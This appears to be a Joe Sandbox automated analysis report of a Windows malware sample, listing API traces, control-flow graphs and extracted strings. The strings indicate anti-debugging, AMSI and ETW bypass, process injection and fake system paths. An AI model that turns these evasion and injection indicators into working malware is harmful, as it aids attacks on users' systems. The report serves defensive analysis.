                                                                                                                                        • Part of subcall function 02DB4C0C: SysFreeString.OLEAUT32(?), ref: 02DB4C1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$CloseFreeNameName_String
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 11680810-0
                                                                                                                                      • Opcode ID: 1f0eaebba184a9786b8fa2d09876a8d9173df8b4e28c3a09612060b733e99da3
                                                                                                                                      • Instruction ID: 1cda7434a97ea35b76cc9c5e2623bf6ef2966c286cd5e63afd334cd8bc3bc727
                                                                                                                                      • Opcode Fuzzy Hash: 1f0eaebba184a9786b8fa2d09876a8d9173df8b4e28c3a09612060b733e99da3
                                                                                                                                      • Instruction Fuzzy Hash: CC21E271650309BAEB11EAD4CC56FDF77BDEF08700F500565B601F7281DAB4AD058B65
                                                                                                                                      Function 02DCEC74 Relevance: 236.3, APIs: 9, Strings: 120, Instructions: 10535filesleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
                                                                                                                                        • Part of subcall function 02DCEB94: GetModuleHandleW.KERNEL32(KernelBase,?,02DCEF98,UacInitialize,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,ScanString,02E0CE80,02DDAFD8,Initialize), ref: 02DCEB9A
                                                                                                                                        • Part of subcall function 02DCEB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DCEBAC
                                                                                                                                        • Part of subcall function 02DCEBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02DCEC00
                                                                                                                                        • Part of subcall function 02DCEBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DCEC12
                                                                                                                                        • Part of subcall function 02DCEBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DCEC29
                                                                                                                                        • Part of subcall function 02DBC2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F058C8,?,02DCFBFE,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession), ref: 02DBC303
                                                                                                                                        • Part of subcall function 02DCDBB0: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDBEB
                                                                                                                                        • Part of subcall function 02DCDBB0: NtClose.NTDLL(?), ref: 02DCDC65
                                                                                                                                        • Part of subcall function 02DB7E3C: GetFileAttributesA.KERNEL32(00000000,?,02DD2A49,ScanString,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,Initialize), ref: 02DB7E47
                                                                                                                                        • Part of subcall function 02DCDACC: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDB0B
                                                                                                                                        • Part of subcall function 02DCDACC: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02DCDB72
                                                                                                                                        • Part of subcall function 02DCDACC: NtClose.NTDLL(?), ref: 02DCDB7B
                                                                                                                                        • Part of subcall function 02DC87A0: LoadLibraryW.KERNEL32(?,?), ref: 02DC87B4
                                                                                                                                        • Part of subcall function 02DC87A0: GetProcAddress.KERNEL32(02E11390,BCryptVerifySignature), ref: 02DC87CE
                                                                                                                                        • Part of subcall function 02DC87A0: FreeLibrary.KERNEL32(02E11390,02E11390,BCryptVerifySignature,bcrypt,?,02E113D0,00000000,02E113A4,02DCA3C7,ScanString,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,Initialize), ref: 02DC880A
                                                                                                                                        • Part of subcall function 02DC870C: LoadLibraryW.KERNEL32(amsi), ref: 02DC8715
                                                                                                                                        • Part of subcall function 02DC870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DC8774
                                                                                                                                      • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,02DDB330), ref: 02DD49B7
                                                                                                                                        • Part of subcall function 02DCDA44: RtlInitUnicodeString.NTDLL ref: 02DCDA6C
                                                                                                                                        • Part of subcall function 02DCDA44: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02DCDA82
                                                                                                                                        • Part of subcall function 02DCDA44: NtDeleteFile.NTDLL(?), ref: 02DCDAA1
                                                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 02DD4BB7
                                                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 02DD4C0D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePath$Library$Name$AddressFreeModuleName_Proc$CloseHandleLoadMove$AttributesCheckDebuggerDeleteInitPresentRemoteSleepStringUnicodeWrite
                                                                                                                                      • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                      • API String ID: 3134816315-2905671141
                                                                                                                                      • Opcode ID: 8744bc6fa80dca7c2cc95331a625fcc7643a7b684740bfc930f2eddcac0213eb
                                                                                                                                      • Instruction ID: ee467fa2b80b05ffa083fb700a1eb183257ec8899d5d0fbfa7515604f6daa4f7
                                                                                                                                      • Opcode Fuzzy Hash: 8744bc6fa80dca7c2cc95331a625fcc7643a7b684740bfc930f2eddcac0213eb
                                                                                                                                      • Instruction Fuzzy Hash: 2B242E75A40559CBDF12EB64DCA0ADD73B6FF89300F6044E6E00AA7355DA31AE86CF60
                                                                                                                                      Function 02DD7877 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2772processthreadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 5349 2dd7877-2dd7c67 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db4898 5464 2dd7c6d-2dd7e40 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db4798 call 2db494c call 2db4d20 call 2db4d9c CreateProcessAsUserW 5349->5464 5465 2dd8af1-2dd8c74 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db4898 5349->5465 5572 2dd7ebe-2dd7fc9 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 5464->5572 5573 2dd7e42-2dd7eb9 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 5464->5573 5554 2dd8c7a-2dd8c89 call 2db4898 5465->5554 5555 2dd9420-2ddaa25 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 * 16 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2dc7b98 call 2dc818c call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 ExitProcess 5465->5555 5554->5555 5564 2dd8c8f-2dd8f62 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dce540 call 2db480c call 2db494c call 2db46a4 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db7e18 5554->5564 5822 2dd8f68-2dd9215 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db4d8c * 2 call 2db4734 call 2dcdacc 5564->5822 5823 2dd921a-2dd941b call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db49a4 call 2dc8bb0 5564->5823 5675 2dd7fcb-2dd7fce 5572->5675 5676 2dd7fd0-2dd82f0 call 2db49a4 call 2dcdc90 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dccfa4 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 5572->5676 5573->5572 5675->5676 5992 2dd8309-2dd8aec call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 ResumeThread call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 CloseHandle call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc7ed4 call 2dc87a0 * 6 CloseHandle call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 5676->5992 5993 2dd82f2-2dd8304 call 2dc8584 5676->5993 5822->5823 5823->5555 5992->5465 5993->5992
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
                                                                                                                                      • CreateProcessAsUserW.ADVAPI32(02F057D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F057DC,02F05820,OpenSession,02E0CE80,02DDAFD8,UacScan,02E0CE80), ref: 02DD7E39
                                                                                                                                      • ResumeThread.KERNEL32(02F05824,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,UacScan,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8), ref: 02DD8483
                                                                                                                                      • CloseHandle.KERNEL32(02F05820,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,UacScan,02E0CE80,02DDAFD8,02F05824,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80), ref: 02DD8602
                                                                                                                                        • Part of subcall function 02DC87A0: LoadLibraryW.KERNEL32(?,?), ref: 02DC87B4
                                                                                                                                        • Part of subcall function 02DC87A0: GetProcAddress.KERNEL32(02E11390,BCryptVerifySignature), ref: 02DC87CE
                                                                                                                                        • Part of subcall function 02DC87A0: FreeLibrary.KERNEL32(02E11390,02E11390,BCryptVerifySignature,bcrypt,?,02E113D0,00000000,02E113A4,02DCA3C7,ScanString,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,Initialize), ref: 02DC880A
                                                                                                                                      • CloseHandle.KERNEL32(02F05820,02F05820,ScanBuffer,02E0CE80,02DDAFD8,UacInitialize,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,UacScan,02E0CE80), ref: 02DD89F4
                                                                                                                                        • Part of subcall function 02DCDACC: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDB0B
                                                                                                                                        • Part of subcall function 02DCDACC: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02DCDB72
                                                                                                                                        • Part of subcall function 02DCDACC: NtClose.NTDLL(?), ref: 02DCDB7B
                                                                                                                                        • Part of subcall function 02DC818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DC8216), ref: 02DC81F8
                                                                                                                                      • ExitProcess.KERNEL32(00000000,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,Initialize,02E0CE80,02DDAFD8,00000000,00000000,00000000,ScanString,02E0CE80,02DDAFD8), ref: 02DDAA25
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                      • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                      • API String ID: 376050052-1225450241
                                                                                                                                      • Opcode ID: d7f7e2aab98d62c24dd219a65365e94d45fd3f6989bff3d0145db98c8df30b4a
                                                                                                                                      • Instruction ID: 72caa14c5d586906247aafc2d04bc1ed1ff837b24eeda661c5fd743d60ed496f
                                                                                                                                      • Opcode Fuzzy Hash: d7f7e2aab98d62c24dd219a65365e94d45fd3f6989bff3d0145db98c8df30b4a
                                                                                                                                      • Instruction Fuzzy Hash: 4F432F75A40558CBCF12EB64DDA09DEB3B6FF88304F6044E6E00AE7755DA319E868F60
                                                                                                                                      Function 02DB1727 Relevance: 9.0, APIs: 7, Instructions: 288sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8533 2db1727-2db1736 8534 2db1968-2db196d 8533->8534 8535 2db173c-2db174c 8533->8535 8538 2db1973-2db1984 8534->8538 8539 2db1a80-2db1a83 8534->8539 8536 2db174e-2db175b 8535->8536 8537 2db17a4-2db17ad 8535->8537 8545 2db175d-2db176a 8536->8545 8546 2db1774-2db1780 8536->8546 8537->8536 8542 2db17af-2db17bb 8537->8542 8540 2db1938-2db1945 8538->8540 8541 2db1986-2db19a2 8538->8541 8543 2db1a89-2db1a8b 8539->8543 8544 2db1684-2db16ad VirtualAlloc 8539->8544 8540->8541 8552 2db1947-2db195b Sleep 8540->8552 8549 2db19b0-2db19bf 8541->8549 8550 2db19a4-2db19ac 8541->8550 8542->8536 8551 2db17bd-2db17c9 8542->8551 8547 2db16df-2db16e5 8544->8547 8548 2db16af-2db16dc call 2db1644 8544->8548 8553 2db176c-2db1770 8545->8553 8554 2db1794-2db17a1 8545->8554 8555 2db1782-2db1790 8546->8555 8556 2db17f0-2db17f9 8546->8556 8548->8547 8559 2db19d8-2db19e0 8549->8559 8560 2db19c1-2db19d5 8549->8560 8558 2db1a0c-2db1a22 8550->8558 8551->8536 8561 2db17cb-2db17de Sleep 8551->8561 8552->8541 8564 2db195d-2db1964 Sleep 8552->8564 8562 2db17fb-2db1808 8556->8562 8563 2db182c-2db1836 8556->8563 8570 2db1a3b-2db1a47 8558->8570 8571 2db1a24-2db1a32 8558->8571 8567 2db19fc-2db19fe call 2db15cc 8559->8567 8568 2db19e2-2db19fa 8559->8568 8560->8558 8561->8536 8566 2db17e4-2db17eb Sleep 8561->8566 8562->8563 8569 2db180a-2db181e Sleep 8562->8569 8572 2db18a8-2db18b4 8563->8572 8573 2db1838-2db1863 8563->8573 8564->8540 8566->8537 8576 2db1a03-2db1a0b 8567->8576 8568->8576 8569->8563 8578 2db1820-2db1827 Sleep 8569->8578 8582 2db1a49-2db1a5c 8570->8582 8583 2db1a68 8570->8583 8571->8570 8579 2db1a34 8571->8579 8574 2db18dc-2db18eb call 2db15cc 8572->8574 8575 2db18b6-2db18c8 8572->8575 8580 2db187c-2db188a 8573->8580 8581 2db1865-2db1873 8573->8581 8592 2db18fd-2db1936 8574->8592 8598 2db18ed-2db18f7 8574->8598 8585 2db18ca 8575->8585 8586 2db18cc-2db18da 8575->8586 8578->8562 8579->8570 8589 2db18f8 8580->8589 8590 2db188c-2db18a6 call 2db1500 8580->8590 8581->8580 8588 2db1875 8581->8588 8584 2db1a6d-2db1a7f 8582->8584 8591 2db1a5e-2db1a63 call 2db1500 8582->8591 8583->8584 8585->8586 8586->8592 8588->8580 8589->8592 8590->8592 8591->8584
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 02DB17D0
                                                                                                                                      • Sleep.KERNEL32(0000000A,00000000), ref: 02DB17E6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                      • Opcode ID: 93dd8b1147b81eb26ffd6abc01c4cdefdc8ab14c245915b85b85c3b8a0092b87
                                                                                                                                      • Instruction ID: 148744882981c3f804f5590f8be72e44315ae163ba06113d4216621c7d52b6f2
                                                                                                                                      • Opcode Fuzzy Hash: 93dd8b1147b81eb26ffd6abc01c4cdefdc8ab14c245915b85b85c3b8a0092b87
                                                                                                                                      • Instruction Fuzzy Hash: 3EB11276A40351CBDB168F29D4E0395BBE1EF85310F1C8ABDD55A8B388C771E892CB90
                                                                                                                                      Function 02DC87A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

